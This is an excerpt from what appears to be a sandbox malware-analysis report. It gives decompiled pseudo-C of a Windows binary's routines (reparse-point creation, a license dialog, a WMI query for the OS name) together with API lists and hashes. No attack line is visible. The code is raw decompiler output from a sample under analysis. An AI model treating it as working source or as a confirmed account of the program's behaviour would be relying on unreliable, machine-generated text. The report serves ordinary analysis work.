                				_t204 = _t203 & 0xffffff00 | _t109 == 0x00000000;
                				 *(_t253 - 0xd) = _t204;
                				if(_t109 == 0) {
                					_t236 = _t253 - 0x1074;
                				}
                				if(_t204 != 0) {
                					_t194 = E003F6088(_t236, L"UNC\\", 4);
                					_t256 = _t256 + 0xc;
                					if(_t194 == 0) {
                						_t195 = 0x5c;
                						 *((short*)(_t253 - 0x207c)) = _t195;
                						_t199 = _t253 - 0x207a;
                						_t236 = _t236 + 6;
                					}
                				}
                				E003F6066(_t199, _t236);
                				_t112 = E003F3E13(_t253 - 0x207c);
                				_t237 =  *((intOrPtr*)(_t253 + 8));
                				_t200 =  *(_t253 + 0xc);
                				 *(_t253 - 0x18) = _t112;
                				if( *((char*)(_t237 + 0x7197)) != 0) {
                					L12:
                					E003DA0B1(_t200, _t204, _t237, _t253, _t200, 1,  *(_t237 + 0x714b) & 0x000000ff);
                					if(E003DA231(_t200) != 0) {
                						_t186 = E003DA28F(E003DA243(_t200));
                						_push(_t200);
                						if(_t186 == 0) {
                							E003DA1E0();
                						} else {
                							E003DA18F();
                						}
                					}
                					if( *((char*)(_t244 + 0x10f1)) != 0 ||  *((char*)(_t244 + 0x2104)) != 0) {
                						__eflags = CreateDirectoryW(_t200, 0);
                						if(__eflags != 0) {
                							goto L21;
                						}
                						_t201 = 0;
                						E003D2021(__eflags, 0x14, 0, _t200);
                						E003D6D83(0x411098, 9);
                						goto L42;
                					} else {
                						_t182 = CreateFileW(_t200, 0x40000000, 0, 0, 1, 0x80, 0);
                						if(_t182 != 0xffffffff) {
                							CloseHandle(_t182);
                							L21:
                							_t117 =  *((intOrPtr*)(_t244 + 0x1100));
                							__eflags = _t117 - 3;
                							if(_t117 != 3) {
                								__eflags = _t117 - 2;
                								if(_t117 == 2) {
                									L27:
                									_t233 =  *(_t253 - 0x2c);
                									_t205 =  *(_t253 - 0x14) & 0x0000ffff;
                									_t238 =  *(_t253 - 0x18) & 0x0000ffff;
                									 *_t233 = 0xa000000c;
                									_t245 = _t205 + _t205;
                									 *((short*)(_t233 + 0xa)) = _t245;
                									 *((short*)(_t233 + 4)) = 0x10 + (_t238 + _t205) * 2;
                									 *((intOrPtr*)(_t233 + 6)) = 0;
                									E003F6066(_t233 + 0x14, _t253 - 0x107c);
                									_t246 =  *(_t253 - 0x2c);
                									 *((short*)(_t246 + 0xc)) = _t245 + 2;
                									 *((short*)(_t246 + 0xe)) = _t238 + _t238;
                									E003F6066(_t246 + ( *(_t253 - 0x14) + 0xb) * 2, _t253 - 0x207c);
                									_t134 =  *(_t253 - 0xd) & 0x000000ff ^ 0x00000001;
                									__eflags = _t134;
                									 *(_t246 + 0x10) = _t134;
                									L28:
                									_t239 = CreateFileW(_t200, 0xc0000000, 0, 0, 3, 0x2200000, 0);
                									__eflags = _t239 - 0xffffffff;
                									if(_t239 != 0xffffffff) {
                										__eflags = DeviceIoControl(_t239, 0x900a4, _t246, ( *(_t246 + 4) & 0x0000ffff) + 8, 0, 0, _t253 - 0x30, 0);
                										if(__eflags != 0) {
                											E003D9556(_t253 - 0x30b4);
                											 *(_t253 - 4) = 1;
                											E003D7A7B(_t253 - 0x30b4, _t239);
                											_t240 =  *((intOrPtr*)(_t253 + 8));
                											_t247 =  *((intOrPtr*)(_t253 + 0x10));
                											asm("sbb ecx, ecx");
                											asm("sbb ecx, ecx");
                											asm("sbb ecx, ecx");
                											E003D9DA2(_t253 - 0x30b4,  *((intOrPtr*)(_t253 + 0x10)),  ~( *(_t240 + 0x82d0)) &  *((intOrPtr*)(_t253 + 0x10)) + 0x00001040,  ~( *(_t240 + 0x82d4)) & _t247 + 0x00001048,  ~( *(_t240 + 0x82d8)) & _t247 + 0x00001050);
                											E003D9620(_t253 - 0x30b4);
                											__eflags =  *((char*)(_t240 + 0x71a8));
                											if( *((char*)(_t240 + 0x71a8)) == 0) {
                												E003DA4ED(_t200,  *((intOrPtr*)(_t247 + 0x24)));
                											}
                											_t201 = 1;
                											E003D959A(_t253 - 0x30b4);
                											goto L42;
                										}
                										CloseHandle(_t239);
                										E003D2021(__eflags, 0x15, 0, _t200);
                										_t154 = GetLastError();
                										__eflags = _t154 - 5;
                										if(_t154 == 5) {
                											L33:
                											__eflags = E003E07BC();
                											if(__eflags == 0) {
                												E003D15C6(_t253 - 0x7c, 0x18);
                												E003E15FE(_t253 - 0x7c);
                											}
                											L35:
                											E003D6DCB(0x411098, __eflags);
                											E003D6D83(0x411098, 9);
                											_t250 =  *((intOrPtr*)(_t253 + 0x10));
                											_push(_t200);
                											__eflags =  *((char*)(_t250 + 0x10f1));
                											if( *((char*)(_t250 + 0x10f1)) == 0) {
                												DeleteFileW();
                											} else {
                												RemoveDirectoryW();
                											}
                											goto L38;
                										}
                										__eflags = _t154 - 0x522;
                										if(__eflags != 0) {
                											goto L35;
                										}
                										goto L33;
                									}
                									E003D6C23(_t200);
                									E003D6D83(0x411098, 9);
                									goto L38;
                								}
                								__eflags = _t117 - 1;
                								if(_t117 != 1) {
                									goto L38;
                								}
                								goto L27;
                							}
                							_t234 =  *(_t253 - 0x2c);
                							_t229 =  *(_t253 - 0x14) & 0x0000ffff;
                							_t242 =  *(_t253 - 0x18) & 0x0000ffff;
                							 *_t234 = 0xa0000003;
                							_t252 = _t229 + _t229;
                							 *((short*)(_t234 + 0xa)) = _t252;
                							 *((short*)(_t234 + 4)) = 0xc + (_t242 + _t229) * 2;
                							 *((intOrPtr*)(_t234 + 6)) = 0;
                							E003F6066(_t234 + 0x10, _t253 - 0x107c);
                							_t246 =  *(_t253 - 0x2c);
                							 *((short*)(_t246 + 0xc)) = _t252 + 2;
                							 *((short*)(_t246 + 0xe)) = _t242 + _t242;
                							E003F6066(_t246 + ( *(_t253 - 0x14) + 9) * 2, _t253 - 0x207c);
                							goto L28;
                						}
                						E003D6C23(_t200);
                						goto L38;
                					}
                				} else {
                					if( *(_t253 - 0xd) != 0) {
                						L38:
                						_t201 = 0;
                						L42:
                						E003D15FB(_t253 - 0x2c);
                						 *[fs:0x0] =  *((intOrPtr*)(_t253 - 0xc));
                						return _t201;
                					}
                					_t190 = E003DBCC3(_t244 + 0x1104);
                					_t269 = _t190;
                					if(_t190 != 0) {
                						goto L38;
                					}
                					_push(_t244 + 0x1104);
                					_push(_t200);
                					_push(_t244 + 0x28);
                					_push(_t237);
                					if(E003D7861(_t269) == 0) {
                						goto L38;
                					}
                					goto L12;
                				}
                			}

                APIs
                • __EH_prolog.LIBCMT ref: 003D6FAA
                • _wcslen.LIBCMT ref: 003D7013
                • _wcslen.LIBCMT ref: 003D7084
                  • Part of subcall function 003D7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 003D7AAB
                  • Part of subcall function 003D7A9C: GetLastError.KERNEL32 ref: 003D7AF1
                  • Part of subcall function 003D7A9C: CloseHandle.KERNEL32(?), ref: 003D7B00
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                • API String ID: 3122303884-3508440684
                • Opcode ID: 572109fd0cde811a77f6c4c59ea89ede1dd419349182f8c918ec5acab9bcfbc6
                • Instruction ID: 8cfe209a7f87c5b936990e7d556a198e63cc737a29639dece20af04043277664
                • Opcode Fuzzy Hash: 572109fd0cde811a77f6c4c59ea89ede1dd419349182f8c918ec5acab9bcfbc6
                • Instruction Fuzzy Hash: 0641F6B2D087447AEB23EB70AD42FEE776C9F04344F004557FA55AB3C2E774AA448661
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 77%
                			E003E9711(void* __edx) {
                				void* __ecx;
                				void* _t20;
                				short* _t24;
                				void* _t28;
                				void* _t29;
                				intOrPtr* _t36;
                				void* _t43;
                				void* _t58;
                				intOrPtr* _t60;
                				short* _t62;
                				short* _t64;
                				intOrPtr* _t68;
                				long _t70;
                				void* _t72;
                				void* _t73;
                
                				_t58 = __edx;
                				_t42 = _t43;
                				if( *((intOrPtr*)(_t43 + 0x10)) == 0) {
                					return _t20;
                				}
                				 *(_t72 + 8) =  *(_t72 + 8) & 0x00000000;
                				_t60 =  *((intOrPtr*)(_t72 + 0x18));
                				 *((char*)(_t72 + 0x13)) = E003E95AA(_t60);
                				_push(0x200 + E003F3E13(_t60) * 2);
                				_t24 = E003F3E33(_t43);
                				_t64 = _t24;
                				if(_t64 == 0) {
                					L16:
                					return _t24;
                				}
                				E003F6066(_t64, L"<html>");
                				E003F7686(_t64, L"<head><meta http-equiv=\"content-type\" content=\"text/html; charset=");
                				E003F7686(_t64, L"utf-8\"></head>");
                				_t73 = _t72 + 0x18;
                				_t68 = _t60;
                				_t28 = 0x20;
                				if( *_t60 != _t28) {
                					L4:
                					_t29 = E003E1FDD(_t77, _t68, L"<html>", 6);
                					 *((char*)(_t73 + 0x12)) = _t29 == 0;
                					if(_t29 == 0) {
                						_t60 = _t68 + 0xc;
                					}
                					E003F7686(_t64, _t60);
                					if( *((char*)(_t73 + 0x1a)) == 0) {
                						E003F7686(_t64, L"</html>");
                					}
                					_t81 =  *((char*)(_t73 + 0x13));
                					if( *((char*)(_t73 + 0x13)) == 0) {
                						_push(_t64);
                						_t64 = E003E9955(_t58, _t81);
                					}
                					_t70 = 9 + E003F3E13(_t64) * 6;
                					_t62 = GlobalAlloc(0x40, _t70);
                					if(_t62 != 0) {
                						_t13 = _t62 + 3; // 0x3
                						if(WideCharToMultiByte(0xfde9, 0, _t64, 0xffffffff, _t13, _t70 - 3, 0, 0) == 0) {
                							 *_t62 = 0;
                						} else {
                							 *_t62 = 0xbbef;
                							 *((char*)(_t62 + 2)) = 0xbf;
                						}
                					}
                					L003F3E2E(_t64);
                					_t24 =  *0x433180(_t62, 1, _t73 + 0x14);
                					if(_t24 >= 0) {
                						E003E95EB( *((intOrPtr*)(_t42 + 0x10)));
                						_t36 =  *((intOrPtr*)(_t73 + 0x10));
                						 *0x403278(_t36,  *((intOrPtr*)(_t73 + 0x10)));
                						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *_t36 + 8))))();
                					}
                					goto L16;
                				} else {
                					goto L3;
                				}
                				do {
                					L3:
                					_t68 = _t68 + 2;
                					_t77 =  *_t68 - _t28;
                				} while ( *_t68 == _t28);
                				goto L4;
                			}

                APIs
                • _wcslen.LIBCMT ref: 003E9736
                • _wcslen.LIBCMT ref: 003E97D6
                • GlobalAlloc.KERNEL32(00000040,?), ref: 003E97E5
                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 003E9806
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: _wcslen$AllocByteCharGlobalMultiWide
                • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                • API String ID: 1116704506-4209811716
                • Opcode ID: 583be0e60b49bced00b9e8244e037ffb43ee8450805a90d43e2131061afdb927
                • Instruction ID: 3946e03e25633dd8b48cf60f3cc6ce5451a9d66bb7de16a1b39cd139b9c5de89
                • Opcode Fuzzy Hash: 583be0e60b49bced00b9e8244e037ffb43ee8450805a90d43e2131061afdb927
                • Instruction Fuzzy Hash: 34312A321083657AD727AF269C06F6F779C9F92310F15021FF601AA1D2EB749A0983A9
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 70%
                			E003EB5C0(void* __ecx, void* __edx, void* __eflags, void* __fp0, struct HWND__* _a4, intOrPtr _a8, signed short _a12, intOrPtr _a16) {
                				long _t9;
                				long _t10;
                				WCHAR* _t11;
                				void* _t25;
                				signed short _t28;
                				void* _t29;
                				intOrPtr _t30;
                				struct HWND__* _t34;
                				intOrPtr _t35;
                				void* _t36;
                				struct HWND__* _t37;
                
                				_t29 = __ecx;
                				_t28 = _a12;
                				_t35 = _a8;
                				_t34 = _a4;
                				if(E003D1316(__edx, _t34, _t35, _t28, _a16, L"LICENSEDLG", 0, 0) != 0) {
                					L16:
                					__eflags = 1;
                					return 1;
                				}
                				_t36 = _t35 - 0x110;
                				if(_t36 == 0) {
                					E003ED69E(_t29, __edx, __eflags, __fp0, _t34);
                					_t9 =  *0x427b7c;
                					__eflags = _t9;
                					if(_t9 != 0) {
                						SendMessageW(_t34, 0x80, 1, _t9);
                					}
                					_t10 =  *0x42ec84;
                					__eflags = _t10;
                					if(_t10 != 0) {
                						SendDlgItemMessageW(_t34, 0x66, 0x172, 0, _t10);
                					}
                					_t11 =  *0x42fc9c;
                					__eflags = _t11;
                					if(__eflags != 0) {
                						SetWindowTextW(_t34, _t11);
                					}
                					_t37 = GetDlgItem(_t34, 0x65);
                					SendMessageW(_t37, 0x435, 0, 0x10000);
                					SendMessageW(_t37, 0x443, 0,  *0x4330c4(0xf));
                					 *0x4330c0(_t34);
                					_t30 =  *0x418444; // 0x0
                					E003E9ED5(_t30, __eflags,  *0x41102c, _t37,  *0x42fc98, 0, 0);
                					L003F3E2E( *0x42fc9c);
                					L003F3E2E( *0x42fc98);
                					goto L16;
                				}
                				if(_t36 != 1) {
                					L5:
                					return 0;
                				}
                				_t25 = (_t28 & 0x0000ffff) - 1;
                				if(_t25 == 0) {
                					_push(1);
                					L7:
                					EndDialog(_t34, ??);
                					goto L16;
                				}
                				if(_t25 == 1) {
                					_push(0);
                					goto L7;
                				}
                				goto L5;
                			}

                APIs
                  • Part of subcall function 003D1316: GetDlgItem.USER32(00000000,00003021), ref: 003D135A
                  • Part of subcall function 003D1316: SetWindowTextW.USER32(00000000,004035F4), ref: 003D1370
                • EndDialog.USER32(?,00000001), ref: 003EB610
                • SendMessageW.USER32(?,00000080,00000001,?), ref: 003EB637
                • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 003EB650
                • SetWindowTextW.USER32(?,?), ref: 003EB661
                • GetDlgItem.USER32(?,00000065), ref: 003EB66A
                • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 003EB67E
                • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 003EB694
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: MessageSend$Item$TextWindow$Dialog
                • String ID: LICENSEDLG
                • API String ID: 3214253823-2177901306
                • Opcode ID: dcea282d329a831c77757125aac4509e194a67e519d5815663f3343b3b429be9
                • Instruction ID: 35bd6b2403193bbd09041af7c79d0224d662233e3ca1e357d7627b8bee13fe48
                • Opcode Fuzzy Hash: dcea282d329a831c77757125aac4509e194a67e519d5815663f3343b3b429be9
                • Instruction Fuzzy Hash: 1F21E732604264BBE6235F77ED49F3B7B7CEB46B42F014134F641A65E0CB6299019639
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 45%
                			E003EFD10(void* __ebx, char* __edx, char* _a4) {
                				int _v8;
                				signed int _v12;
                				char _v20;
                				short* _v28;
                				signed int _v32;
                				short* _v36;
                				int _v40;
                				int _v44;
                				intOrPtr _v60;
                				void* __edi;
                				void* __esi;
                				signed int _t30;
                				signed int _t31;
                				char _t33;
                				int _t34;
                				signed short _t36;
                				signed short _t38;
                				void* _t49;
                				short* _t50;
                				int _t52;
                				int _t53;
                				char* _t58;
                				int _t59;
                				void* _t60;
                				char* _t61;
                				intOrPtr* _t62;
                				intOrPtr* _t63;
                				char* _t69;
                				intOrPtr _t70;
                				int _t71;
                				intOrPtr* _t72;
                				void* _t74;
                				short* _t75;
                				void* _t78;
                				signed int _t79;
                				void* _t81;
                				short* _t82;
                
                				_t69 = __edx;
                				_push(0xfffffffe);
                				_push(0x40c130);
                				_push(E003F2900);
                				_push( *[fs:0x0]);
                				_t82 = _t81 - 0x18;
                				_t30 =  *0x40e7ac; // 0xc24f6281
                				_v12 = _v12 ^ _t30;
                				_t31 = _t30 ^ _t79;
                				_v32 = _t31;
                				_push(__ebx);
                				_push(_t75);
                				_push(_t71);
                				_push(_t31);
                				 *[fs:0x0] =  &_v20;
                				_v28 = _t82;
                				_t58 = _a4;
                				if(_t58 != 0) {
                					_t61 = _t58;
                					_t69 =  &(_t61[1]);
                					do {
                						_t33 =  *_t61;
                						_t61 =  &(_t61[1]);
                					} while (_t33 != 0);
                					_t62 = _t61 - _t69;
                					_t34 = _t62 + 1;
                					_v44 = _t34;
                					if(_t34 > 0x7fffffff) {
                						L17:
                						E003EFCF0(0x80070057);
                						goto L18;
                					} else {
                						_t71 = MultiByteToWideChar(0, 0, _t58, _t34, 0, 0);
                						_v40 = _t71;
                						if(_t71 == 0) {
                							L18:
                							_t36 = GetLastError();
                							if(_t36 > 0) {
                								_t36 = _t36 & 0x0000ffff | 0x80070000;
                							}
                							E003EFCF0(_t36);
                							goto L21;
                						} else {
                							_v8 = 0;
                							_t49 = _t71 + _t71;
                							if(_t71 >= 0x1000) {
                								_push(_t49);
                								_t50 = E003F3E33(_t62);
                								_t82 =  &(_t82[2]);
                								_t75 = _t50;
                								_v36 = _t75;
                								_v8 = 0xfffffffe;
                							} else {
                								E00402010(_t49);
                								_v28 = _t82;
                								_t75 = _t82;
                								_v36 = _t75;
                								_v8 = 0xfffffffe;
                							}
                							if(_t75 == 0) {
                								L16:
                								E003EFCF0(0x8007000e);
                								goto L17;
                							} else {
                								_t52 = MultiByteToWideChar(0, 0, _t58, _v44, _t75, _t71);
                								if(_t52 == 0) {
                									L21:
                									if(_t71 >= 0x1000) {
                										L003F3E2E(_t75);
                										_t82 =  &(_t82[2]);
                									}
                									_t38 = GetLastError();
                									if(_t38 > 0) {
                										_t38 = _t38 & 0x0000ffff | 0x80070000;
                									}
                									E003EFCF0(_t38);
                									asm("int3");
                									asm("int3");
                									asm("int3");
                									asm("int3");
                									asm("int3");
                									asm("int3");
                									asm("int3");
                									asm("int3");
                									_push(_t79);
                									_t70 = _v60;
                									_push(_t71);
                									_t72 = _t62;
                									 *_t72 = 0x4056f8;
                									 *((intOrPtr*)(_t72 + 4)) =  *((intOrPtr*)(_t70 + 4));
                									_t63 =  *((intOrPtr*)(_t70 + 8));
                									 *((intOrPtr*)(_t72 + 8)) = _t63;
                									 *(_t72 + 0xc) = 0;
                									if(_t63 != 0) {
                										 *0x403278(_t63, _t75);
                										 *((intOrPtr*)( *((intOrPtr*)( *_t63 + 4))))();
                									}
                									return _t72;
                								} else {
                									__imp__#2(_t75);
                									_t59 = _t52;
                									if(_t71 >= 0x1000) {
                										L003F3E2E(_t75);
                										_t82 =  &(_t82[2]);
                									}
                									if(_t59 == 0) {
                										goto L16;
                									} else {
                										_t53 = _t59;
                										goto L2;
                									}
                								}
                							}
                						}
                					}
                				} else {
                					_t53 = 0;
                					L2:
                					 *[fs:0x0] = _v20;
                					_pop(_t74);
                					_pop(_t78);
                					_pop(_t60);
                					return E003EFBBC(_t53, _t60, _v32 ^ _t79, _t69, _t74, _t78);
                				}
                			}









































                APIs
                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,C24F6281,00000001,00000000,00000000,?,?,003DAF6C,ROOT\CIMV2), ref: 003EFD99
                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,003DAF6C,ROOT\CIMV2), ref: 003EFE14
                • SysAllocString.OLEAUT32(00000000), ref: 003EFE1F
                • _com_issue_error.COMSUPP ref: 003EFE48
                • _com_issue_error.COMSUPP ref: 003EFE52
                • GetLastError.KERNEL32(80070057,C24F6281,00000001,00000000,00000000,?,?,003DAF6C,ROOT\CIMV2), ref: 003EFE57
                • _com_issue_error.COMSUPP ref: 003EFE6A
                • GetLastError.KERNEL32(00000000,?,?,003DAF6C,ROOT\CIMV2), ref: 003EFE80
                • _com_issue_error.COMSUPP ref: 003EFE93
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                • String ID:
                • API String ID: 1353541977-0
                • Opcode ID: 3341f8f763f8b3150fc63ed162eb5915febdc63d8077eea9e60c9a8d1b34ad2c
                • Instruction ID: a6ca50326e965d41f9abce9ae13b9f54c80123e49b585c3219dda8c30e9783d4
                • Opcode Fuzzy Hash: 3341f8f763f8b3150fc63ed162eb5915febdc63d8077eea9e60c9a8d1b34ad2c
                • Instruction Fuzzy Hash: 8141DB71A00269AFC7119F65CC45BAFBBA8EF84710F204339F505EB2D1D775A90087A5
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 29%
                			E003DAF24() {
                				intOrPtr* _t63;
                				intOrPtr* _t64;
                				void* _t66;
                				intOrPtr* _t67;
                				signed char _t70;
                				intOrPtr* _t72;
                				signed char** _t75;
                				signed char** _t76;
                				signed char* _t77;
                				intOrPtr* _t78;
                				void* _t80;
                				signed char _t81;
                				intOrPtr* _t82;
                				intOrPtr* _t85;
                				signed char _t92;
                				signed char _t98;
                				signed char _t105;
                				signed char _t108;
                				signed char* _t118;
                				signed char _t119;
                				signed char _t127;
                				signed char _t139;
                				void* _t147;
                				void* _t149;
                				void* _t155;
                				void* _t162;
                
                				E003EEB78(0x402919, _t162);
                				_push(_t162 - 0x14);
                				_push(0x40574c);
                				_t105 = 0;
                				_push(1);
                				_push(0);
                				_push(0x40581c);
                				 *((intOrPtr*)(_t162 - 0x14)) = 0;
                				if( *0x433188() >= 0) {
                					_push(L"ROOT\\CIMV2");
                					 *((intOrPtr*)(_t162 - 0x10)) = 0;
                					_t63 =  *((intOrPtr*)(E003DAE2D(_t162 - 0x20)));
                					 *(_t162 - 4) = 0;
                					if(_t63 == 0) {
                						_t108 = 0;
                					} else {
                						_t108 =  *_t63;
                					}
                					_t64 =  *((intOrPtr*)(_t162 - 0x14));
                					 *0x403278(_t64, _t108, _t105, _t105, _t105, _t105, _t105, _t105, _t162 - 0x10, _t147);
                					_t66 =  *((intOrPtr*)( *_t64 + 0xc))();
                					 *(_t162 - 4) =  *(_t162 - 4) | 0xffffffff;
                					_t149 = _t66;
                					_t110 =  *(_t162 - 0x20);
                					if( *(_t162 - 0x20) != 0) {
                						E003DAEF6(_t110);
                					}
                					if(_t149 < 0) {
                						L21:
                						_t67 =  *((intOrPtr*)(_t162 - 0x14));
                						 *0x403278(_t67);
                						 *((intOrPtr*)( *((intOrPtr*)( *_t67 + 8))))();
                						_t70 = 0;
                					} else {
                						_push(_t105);
                						_push(_t105);
                						_push(3);
                						_push(3);
                						_push(_t105);
                						_push(_t105);
                						_push(0xa);
                						_push( *((intOrPtr*)(_t162 - 0x10)));
                						if( *0x433184() < 0) {
                							L20:
                							_t72 =  *((intOrPtr*)(_t162 - 0x10));
                							 *0x403278(_t72);
                							 *((intOrPtr*)( *((intOrPtr*)( *_t72 + 8))))();
                							goto L21;
                						} else {
                							_push("SELECT * FROM Win32_OperatingSystem");
                							 *(_t162 - 0x18) = _t105;
                							_t75 = E003DADDB(_t162 - 0x28);
                							_push("WQL");
                							 *(_t162 - 4) = 1;
                							_t76 = E003DADDB(_t162 - 0x20);
                							_t118 =  *_t75;
                							 *(_t162 - 4) = 2;
                							if(_t118 == 0) {
                								_t139 = _t105;
                							} else {
                								_t139 =  *_t118;
                							}
                							_t77 =  *_t76;
                							if(_t77 == 0) {
                								_t119 = _t105;
                							} else {
                								_t119 =  *_t77;
                							}
                							_t78 =  *((intOrPtr*)(_t162 - 0x10));
                							 *0x403278(_t78, _t119, _t139, 0x30, _t105, _t162 - 0x18);
                							_t80 =  *((intOrPtr*)( *_t78 + 0x50))();
                							_t121 =  *(_t162 - 0x20);
                							_t155 = _t80;
                							if( *(_t162 - 0x20) != 0) {
                								E003DAEF6(_t121);
                								 *(_t162 - 0x20) = _t105;
                							}
                							 *(_t162 - 4) =  *(_t162 - 4) | 0xffffffff;
                							_t122 =  *((intOrPtr*)(_t162 - 0x28));
                							if( *((intOrPtr*)(_t162 - 0x28)) != 0) {
                								E003DAEF6(_t122);
                							}
                							if(_t155 >= 0) {
                								_t81 =  *(_t162 - 0x18);
                								 *(_t162 - 0x1c) = _t105;
                								 *(_t162 - 0x24) = _t105;
                								if(_t81 != 0) {
                									while(1) {
                										 *0x403278(_t81, 0xffffffff, 1, _t162 - 0x1c, _t162 - 0x24);
                										 *((intOrPtr*)( *_t81 + 0x10))();
                										if( *(_t162 - 0x24) == 0) {
                											goto L26;
                										}
                										_t92 =  *(_t162 - 0x1c);
                										 *0x403278(_t92, L"Name", 0, _t162 - 0x38, 0, 0);
                										 *((intOrPtr*)( *_t92 + 0x10))();
                										_t105 = _t105 | E003F23F9( *((intOrPtr*)( *_t92 + 0x10))) & 0xffffff00 | _t95 != 0x00000000;
                										__imp__#9(_t162 - 0x38,  *((intOrPtr*)(_t162 - 0x30)), L"Windows 10");
                										_t98 =  *(_t162 - 0x1c);
                										 *0x403278(_t98);
                										 *((intOrPtr*)( *((intOrPtr*)( *_t98 + 8))))();
                										_t81 =  *(_t162 - 0x18);
                										if(_t81 != 0) {
                											continue;
                										}
                										goto L26;
                									}
                								}
                								L26:
                								_t82 =  *((intOrPtr*)(_t162 - 0x10));
                								 *0x403278(_t82);
                								 *((intOrPtr*)( *((intOrPtr*)( *_t82 + 8))))();
                								_t85 =  *((intOrPtr*)(_t162 - 0x14));
                								 *0x403278(_t85);
                								 *((intOrPtr*)( *((intOrPtr*)( *_t85 + 8))))();
                								_t127 =  *(_t162 - 0x18);
                								 *0x403278(_t127);
                								 *((intOrPtr*)( *((intOrPtr*)( *_t127 + 8))))();
                								_t70 = _t105;
                							} else {
                								goto L20;
                							}
                						}
                					}
                				} else {
                					_t70 = 0;
                				}
                				 *[fs:0x0] =  *((intOrPtr*)(_t162 - 0xc));
                				return _t70;
                			}






























                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: H_prolog
                • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                • API String ID: 3519838083-3505469590
                • Opcode ID: 28cb7eb694d4783e64508081f67741000ac72f7d5e2a05493dab13105b18246d
